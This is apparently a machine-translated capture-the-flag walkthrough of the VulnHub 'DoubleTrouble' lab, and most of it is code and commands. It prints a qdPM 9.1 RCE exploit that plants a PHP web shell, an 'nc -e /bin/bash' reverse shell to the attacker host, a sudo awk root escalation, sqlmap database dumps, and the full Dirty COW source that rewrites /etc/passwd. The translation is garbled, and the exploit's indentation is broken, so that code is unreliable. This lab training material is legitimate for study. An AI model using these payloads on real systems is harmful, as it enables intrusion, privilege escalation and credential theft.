1、 Target information

Target name ：DoubleTrouble

Target difficulty ： secondary

Virtual machine environment ： This target is recommended Virtualbox build

The goal is ： obtain root jurisdiction +Flag

Target address ：https://download.vulnhub.com/doubletrouble/doubletrouble.ova

2、 Drone aircraft -1

2.1 The host found

2.1.1 use first ARP Protocol for host discovery , Find the target IP-192.168.189.5

sudo arp-scan -l

2.1.2 Target machine IP Address using Nmap Port discovery , Target on 22,80 port

nmap -p- 192.168.189.5

2.1.3 Identify the service version of the open port ,22 Port is OpenSSH 7.9p1,80 Port is Apache 2.4.38, And the target is Debian System

nmap -p 22,80 -sV 192.168.189.5

2.2 Web information gathering

2.2.1 Access target 80 port , You can see the use of open source projects CMS edition ：qdPM 9.1

http://192.168.189.5/

2.2.2 Use dirsearch On the target site Web Directory crawling

dirsearch -u http://192.168.189.5 -e *

2.3 Image steganography

2.3.1 Yes secret Download the pictures in the directory , Since the catalogue is called secret, It is suspected that the picture uses steganography

http://192.168.189.5/secret/doubletrouble.jpg

2.3.2 Use steghide Read information , Find out you need a password , It is more verified that there is a problem with this picture

steghide info doubletrouble.jpg

2.3.3 Use stegseek Do code blast , Find the password for 92camaro, And the file is stored as file

GitHub - RickdeJager/stegseek: Worlds fastest steghide cracker, chewing through millions of passwords per second

stegseek doubletrouble.jpg /usr/share/wordlists/rockyou.txt -xf file

2.3.4 Open it with the name file The file of , Found a text with suspected account secret

[email protected]

otis666

2.3.5 Successfully log in to the system using the account secret above

2.4 EXP Code using

2.4.1 Use exp-db retrieval qdPM 9.1, Found a RCE Loophole , The downloaded code cannot be used directly , There are several line breaks , You can directly use the one I modified below

Site address ：qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) - PHP webapps Exploit

# Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)
# Google Dork: intitle:qdPM 9.1. Copyright  2020 qdpm.net
# Date: 2021-08-03
# Original Exploit Author: Rishal Dwivedi (Loginsoft)
# Original ExploitDB ID: 47954
# Exploit Author: Leon Trappett (thepcn3rd)
# Vendor Homepage: http://qdpm.net/
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: <=1.9.1
# Tested on: Ubuntu Server 20.04 (Python 3.9.2)
# CVE : CVE-2020-7246
# Exploit written in Python 3.9.2
# Tested Environment - Ubuntu Server 20.04 LTS
# Path Traversal + Remote Code Execution

#!/usr/bin/python3

import sys
import requests
from lxml import html
from argparse import ArgumentParser

session_requests = requests.session()

def multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, uservar):
    request_1 = {
        'sf_method': (None, 'put'),
        'users[id]': (None, userid[-1]),
        'users[photo_preview]': (None, uservar),
        'users[_csrf_token]': (None, csrftoken_[-1]),
        'users[name]': (None, username[-1]),
        'users[new_password]': (None, ''),
        'users[email]': (None, EMAIL),
        'extra_fields[9]': (None, ''),
        'users[remove_photo]': (None, '1'),
    }
    return request_1


def req(userid, username, csrftoken_, EMAIL, HOSTNAME):
    request_1 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME,
                         '.htaccess')
    new = session_requests.post(HOSTNAME + 'index.php/myAccount/update',
                                files=request_1)
    request_2 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME,
                         '../.htaccess')
    new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update',
                                 files=request_2)
    request_3 = {
        'sf_method': (None, 'put'),
        'users[id]': (None, userid[-1]),
        'users[photo_preview]': (None, ''),
        'users[_csrf_token]': (None, csrftoken_[-1]),
        'users[name]': (None, username[-1]),
        'users[new_password]': (None, ''),
        'users[email]': (None, EMAIL),
        'extra_fields[9]': (None, ''),
        'users[photo]': ('backdoor.php',
                         '<?php if(isset($_REQUEST[\'cmd\'])){ echo"<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'
                         , 'application/octet-stream'),
    }
    upload_req = session_requests.post(HOSTNAME +
                                       'index.php/myAccount/update', files=request_3)
    
    
    def main(HOSTNAME, EMAIL, PASSWORD):
        url = HOSTNAME + '/index.php/login'
        result = session_requests.get(url)
        #print(result.text)
        login_tree = html.fromstring(result.text)
        authenticity_token =list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value")))[0]
        payload = {'login[email]': EMAIL, 'login[password]': PASSWORD,
                   'login[_csrf_token]': authenticity_token}
        result = session_requests.post(HOSTNAME + '/index.php/login',
                                       data=payload, headers=dict(referer=HOSTNAME + '/index.php/login'))
        # The designated admin account does not have a myAccount page
        account_page = session_requests.get(HOSTNAME + 'index.php/myAccount')
        account_tree = html.fromstring(account_page.content)
        userid = account_tree.xpath("//input[@name='users[id]']/@value")
        username = account_tree.xpath("//input[@name='users[name]']/@value")
        csrftoken_ =account_tree.xpath("//input[@name='users[_csrf_token]']/@value")
        req(userid, username, csrftoken_, EMAIL, HOSTNAME)
        get_file = session_requests.get(HOSTNAME + 'index.php/myAccount')
        final_tree = html.fromstring(get_file.content)
        backdoor =final_tree.xpath("//input[@name='users[photo_preview]']/@value")
        print('Backdoor uploaded at - > ' + HOSTNAME + '/uploads/users/' +
              backdoor[-1] + '?cmd=whoami')
        
        
        if __name__ == '__main__':
            print("You are not able to use the designated admin account because they do not have a myAccount page.\n")
            parser = ArgumentParser(description='qdmp - Path traversal + RCE Exploit')
            parser.add_argument('-url', '--host', dest='hostname', help='Project URL')
            parser.add_argument('-u', '--email', dest='email', help='User email(Any privilege account)')
            parser.add_argument('-p', '--password', dest='password', help='User password')
            args = parser.parse_args()
            # Added detection if the arguments are passed and populated, if not display the arguments
            if  (len(sys.argv) > 1 and isinstance(args.hostname, str) and
                 isinstance(args.email, str) and isinstance(args.password, str)):
                main(args.hostname, args.email, args.password)
            else:
                parser.print_help()

2.4.2 Use exp, The script reminds us that the back door has been uploaded to http://192.168.189.5//uploads/users/?cmd=whoami

python 50175.py -url http://192.168.189.5/ -u [email protected] -p otis666

2.4.3 Access the backdoor directory , You can see a back door php file

http://192.168.189.5//uploads/users/?cmd=whoami

2.4.4 You can directly execute remote commands , Next we try to rebound shell

http://192.168.189.5//uploads/users/966210-backdoor.php?cmd=id

2.4.5 Use nc Direct rebound shell

kali：nc -nvlp 9999

Drone aircraft ：http://192.168.189.5//uploads/users/966210-backdoor.php?cmd=nc -e /bin/bash 192.168.189.4 9999

2.5 awk Raise the right

2.5.1 Use sudo command , See what can be done sudo command , Find out awk Be able to sudo By

sudo -l

2.5.2 Search on the website awk command , See if there is a way to raise rights , choice sudo In the form of , Find the right to raise payload

awk | GTFOBins

2.5.3 Use the right raising command to successfully raise the right to root

sudo awk 'BEGIN {system("/bin/sh")}'

2.5.4 stay root Under the table of contents , I found another one ova Virtualized files

2.5.5 take ova Download the file locally , And import to virtualBox in

Drone aircraft ：python3 -m http.server 8088

kali：wget http://192.168.189.5:8088/doubletrouble.ova

3、 Drone aircraft -2

3.1 The host found

3.1.1 Same as above , Also use arp Protocol for host discovery

sudo arp-scan -l

3.1.2 Use nmap Port discovery

nmap -p- 192.168.189.6

3.1.3 Perform version service discovery on open ports

nmap -p 22,80 -sV 192.168.189.6

3.2 SQL Inject

3.2.1 Find out 80 Port is a login interface

http://192.168.189.6/

3.2.2 By convention , Use dirsearch, But no directory found

dirsearch -u http://192.168.189.6 -e *

3.2.3 Use sqlmap Blast ,sqlmap Find a time-based injection point , adopt burp Succeed in reproducing , There are loopholes

sqlmap -u http://192.168.189.6 -forms

3.2.4 Try blasting the database , Get two database information ,doubletrouble and information_schema

sqlmap -u http://192.168.189.6 --batch -forms -dbs

3.2.5 Perform table explosion on the database , To obtain a users surface

sqlmap -u http://192.168.189.6 --batch -forms -D doubletrouble --tables

3.2.6 Yes users The fields of the table are exploded , Found two account secrets

sqlmap -u http://192.168.189.6 --batch -forms -D doubletrouble -T users --dump

username1：montreux password1：GfsZxc1

username1：clapton password1：ZubZub99

3.2.7 Web The page cannot be logged in with two account keys , Use ssh Only clapton/ZubZub99 Be able to log in

3.3 The right of a dirty cow

3.3.1 Show clapton Users can sudo All commands executed in this way , Found that there was no sudo jurisdiction , Then under its user directory , Find one flag

flag：6CEA7A737C7C651F6DA7669109B5FB52

3.3.2 View kernel , Found as 3.2.0, There is a dirty cow privilege raising vulnerability in this kernel

uname -a

3.3.3 download exp file

GitHub - firefart/dirtycow: Dirty Cow exploit - CVE-2016-5195

kali：python3 -m http.server 80

Drone aircraft ：wget http://192.168.189.4/dirty.c

//
// This exploit uses the pokemon exploit of the dirtycow vulnerability
// as a base and automatically generates a new passwd line.
// The user will be prompted for the new password when the binary is run.
// The original /etc/passwd file is then backed up to /tmp/passwd.bak
// and overwrites the root account with the generated line.
// After running the exploit you should be able to login with the newly
// created user.
//
// To use this exploit modify the user values according to your needs.
//   The default is "firefart".
//
// Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
//   https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
//
// Compile with:
//   gcc -pthread dirty.c -o dirty -lcrypt
//
// Then run the newly create binary by either doing:
//   "./dirty" or "./dirty my-new-password"
//
// Afterwards, you can either "su firefart" or "ssh [email protected]"
//
// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
//   mv /tmp/passwd.bak /etc/passwd
//
// Exploit adopted by Christian "FireFart" Mehlmauer
// https://firefart.at
//

#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <stdlib.h>
#include <unistd.h>
#include <crypt.h>

const char *filename = "/etc/passwd";
const char *backup_filename = "/tmp/passwd.bak";
const char *salt = "firefart";

int f;
void *map;
pid_t pid;
pthread_t pth;
struct stat st;

struct Userinfo {
    char *username;
    char *hash;
    int user_id;
    int group_id;
    char *info;
    char *home_dir;
    char *shell;
};

char *generate_password_hash(char *plaintext_pw) {
    return crypt(plaintext_pw, salt);
}

char *generate_passwd_line(struct Userinfo u) {
    const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
    int size = snprintf(NULL, 0, format, u.username, u.hash,
                        u.user_id, u.group_id, u.info, u.home_dir, u.shell);
    char *ret = malloc(size + 1);
    sprintf(ret, format, u.username, u.hash, u.user_id,
            u.group_id, u.info, u.home_dir, u.shell);
    return ret;
}

void *madviseThread(void *arg) {
    int i, c = 0;
    for(i = 0; i < 200000000; i++) {
        c += madvise(map, 100, MADV_DONTNEED);
    }
    printf("madvise %d\n\n", c);
}

int copy_file(const char *from, const char *to) {
    // check if target file already exists
    if(access(to, F_OK) != -1) {
        printf("File %s already exists! Please delete it and run again\n",
               to);
        return -1;
    }
    
    char ch;
    FILE *source, *target;
    
    source = fopen(from, "r");
    if(source == NULL) {
        return -1;
    }
    target = fopen(to, "w");
    if(target == NULL) {
        fclose(source);
        return -1;
    }
    
    while((ch = fgetc(source)) != EOF) {
        fputc(ch, target);
    }
    
    printf("%s successfully backed up to %s\n",
           from, to);
    
    fclose(source);
    fclose(target);
    
    return 0;
}

int main(int argc, char *argv[])
{
    // backup file
    int ret = copy_file(filename, backup_filename);
    if (ret != 0) {
        exit(ret);
    }
    
    struct Userinfo user;
    // set values, change as needed
    user.username = "firefart";
    user.user_id = 0;
    user.group_id = 0;
    user.info = "pwned";
    user.home_dir = "/root";
    user.shell = "/bin/bash";
    
    char *plaintext_pw;
    
    if (argc >= 2) {
        plaintext_pw = argv[1];
        printf("Please enter the new password: %s\n", plaintext_pw);
    } else {
        plaintext_pw = getpass("Please enter the new password: ");
    }
    
    user.hash = generate_password_hash(plaintext_pw);
    char *complete_passwd_line = generate_passwd_line(user);
    printf("Complete line:\n%s\n", complete_passwd_line);
    
    f = open(filename, O_RDONLY);
    fstat(f, &st);
    map = mmap(NULL,
               st.st_size + sizeof(long),
               PROT_READ,
               MAP_PRIVATE,
               f,
               0);
    printf("mmap: %lx\n",(unsigned long)map);
    pid = fork();
    if(pid) {
        waitpid(pid, NULL, 0);
        int u, i, o, c = 0;
        int l=strlen(complete_passwd_line);
        for(i = 0; i < 10000/l; i++) {
            for(o = 0; o < l; o++) {
                for(u = 0; u < 10000; u++) {
                    c += ptrace(PTRACE_POKETEXT,
                                pid,
                                map + o,
                                *((long*)(complete_passwd_line + o)));
                }
            }
        }
        printf("ptrace %d\n",c);
    }
    else {
        pthread_create(&pth,
                       NULL,
                       madviseThread,
                       NULL);
        ptrace(PTRACE_TRACEME);
        kill(getpid(), SIGSTOP);
        pthread_join(pth,NULL);
    }
    
    printf("Done! Check %s to see if the new user was created.\n", filename);
    printf("You can log in with the username '%s' and the password '%s'.\n\n",
           user.username, plaintext_pw);
    printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n",
           backup_filename, filename);
    return 0;
}

3.3.4 Run... After compilation , Create a root Privileged user firefart

gcc -pthread dirty.c -o dirty -lcrypt

./dirty root

username：firefart

password：root

3.3.5 Switch to firefart user , This user is in root In the group

su firefart

3.3.6 Read root Under the table of contents flag

flag：1B8EEA89EA92CECB931E3CC25AA8DE21